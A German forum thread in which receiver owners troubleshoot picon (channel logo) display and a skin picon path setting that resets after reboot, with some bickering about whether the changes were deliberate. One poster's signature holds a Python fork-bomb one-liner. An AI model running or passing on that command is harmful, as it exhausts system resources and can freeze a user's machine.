Picons

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

• vielleicht sind die Picons ,die online geladen werden können (plugin) so unvollständig. Habe die 3d HD Picons von Kabel geladen, und ich bin bei KabelBW.

Seltsam nur, dass so "normale" Sender wie ARD nicht dabei sind...

wo finde ich per FTP denn den USB stick?

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von rapfi ()

• habe das Problem gelöst!

die picons wurden bei allen Sendern nicht angezeigt, deren Namen ich umbenannt hatte, damit ich das Display besser nutzen konnte (größere Schrift, statt Das Erste z.B. ARD).

Habe sie erneut ubenannt und schon ist das picon da!

Danke Euch für die Mühe!
  • ich schreib jetzt einfach mal hier dazu.
    der thread passt ganz gut. bei mir gehts zwar um die 8k aber ich habe die gleichen picon probleme mit 2.8.4
    bin ja schon so weit gekommen das ich die picons angezeigt bekomme.
    allerdings speichert meine box beim shutdown nicht die einstellungen für den
    skin picon pfad.
    ich stelle ihn im expert menu immer auf interer flash.
    nach einem reboot ist mein skin picon pfad immer wieder auf aus.
  • ja das hab ich gemacht.
    diese einstellung merkt sich die box komischerweise auch.

habs bei meiner 800 jetzt mal ausprobiert.
    da hab ich das gleiche problem.
    nach einem reboot ist die einstellung wieder weg.

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von alex0816 ()

• Original von mucky
    hast du die Installation in den flash auch auf ja gestellt ?

Na klar aber es geht trotzdem nicht, bei mir kommt nur der Pfad zur HDD, ist schon komisch weil es vorher immer 1a geklappt hat.

Mr.T45

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Mr.T45 ()

• Original von Mr.T45
    Original von mucky

Na klar aber es geht trotzdem nicht, bei mir kommt nur der Pfad zur HDD, ist schon komisch weil es vorher immer 1a geklappt hat.

Mr.T45

für das problem hab ich schon eine lösung.
    setze mal im expertmenü den minimum flashspeicher herunter.
    der steht standard auf 16 mb.
    wenn du weniger frei hast, kannst du nur deine hdd beim picon download auswählen.
  • Original von alex0816
    Original von Mr.T45
    Original von mucky

Mr.T45

für das problem hab ich schon eine lösung.
    setze mal im expertmenü den minimum flashspeicher herunter.
    der steht standard auf 16 mb.
    wenn du weniger frei hast, kannst du nur deine hdd beim picon download auswählen.

Das ist keine lösung sondern pure absicht der user soll selber auswählen ob er das in flash will und darauf hingewiesen werden das der flashspeicher knapp ist. Wenn dann das image schrott ist brauch keiner zu maulen weil ihr das selber freigegeben habt und zum piconpfad da reicht es nicht auf der fernbedienung ok zu drücken ihr müsst schon die grüne taste drücken zum speichern auch das ist absicht.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Original von kati910
    ihr müsst schon die grüne taste drücken zum speichern auch das ist absicht.

was meinst du was ich gemacht habe?
    natürlich hab ich die grüne taste gedrückt.
    das merkt er sich bei mir aber nicht.
    zumindesten nicht die einstellung für den picon pfad auf interner flash.
    ich hab die picons jetzt aufm usb-stick.
    die einstellung geht auch zu speichern.
  • Original von alex0816
    Original von kati910
    ihr müsst schon die grüne taste drücken zum speichern auch das ist absicht.

was meinst du was ich gemacht habe?
    natürlich hab ich die grüne taste gedrückt.
    das merkt er sich bei mir aber nicht.
    zumindesten nicht die einstellung für den picon pfad auf interner flash.
    ich hab die picons jetzt aufm usb-stick.
    die einstellung geht auch zu speichern.

wie ich schon geschrieben hab, im root nen ordner machen der piconHD heisst, nen "picons" ordner löschen falls vorhanden... (kann nach GUI reboot oder kompletten reboot wieder da sein, wie bei vielen, dann einfach wieder löschen)

dann im expert menu die einstellungen vornehmen, "Installation in ... Flash" = JA
    und SkinPiconPfad = Internalflash..

mit der der Piconsache hat man sich hier selber nen kleines EI gelegt... ging ja früher auch alles so...
    Probleme kann man niemals mit derselben Denkweise lösen.

¯\_(ツ)_/¯

"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von deepblue2000 ()

• Ist das ne anleitung für multiboot user?
    Ei gelegt? was soll diese klugscheisserei hier tuts das in den betatests auch ihr bekommts net gebacken und deswegen haben wir uns nen ei gelegt?
    :doh: :doh:
  • Original von kati910
    Ist das ne anleitung für multiboot user?
    Ei gelegt? was soll diese klugscheisserei hier tuts das in den betatests auch ihr bekommts net gebacken und deswegen haben wir uns nen ei gelegt?

:baby:
    Kannst du keine Kritik vertragen?
    Fakt ist einfach, dass das mit den Picons ab Version 2.8.4 viel umständlicher ist als bei den früheren Versionen.
    Es sagt ja keiner das es nicht geht.
    Es geht halt nur viel umständlicher!
  • I have this problem on 7025+ and 2.8.4.

Picons are located on flash (/picon/). Location of skin picons is set as "internal flash" in Expert Menu. This setting is lost (changed back to "off") on enigma2 restart and the picons are not showing anymore. If you visit Expert Menu again after restart (you don't have to make any changes in the menu, just open and close it), the setting is "refreshed" back to "internal flash" and picons are working again.
  • Original von alex0816
    Original von kati910
    Ist das ne anleitung für multiboot user?

:baby:
    Kannst du keine Kritik vertragen?
    Fakt ist einfach, dass das mit den Picons ab Version 2.8.4 viel umständlicher ist als bei den früheren Versionen.
    Es sagt ja keiner das es nicht geht.
    Es geht halt nur viel umständlicher!

Kritik ist das eine gemotze was anderes !! Und zu dem umständlicher das war absicht es sollen flash installationen nur von leuten ausgeführt werden die auch das wissen dazu haben weil die meisten sich den falsh zumüllen und wir die crashlogs kriegen und das nervt.
    Ich möche euch mal sehen wenn man täglich crashlogs bekommt weil user mit 5MB freien flash speichers sich noch picons installieren und danach die box nimmer bootet.
    Wenn euch das zu kompliziert ist nehmt nen usb und gut.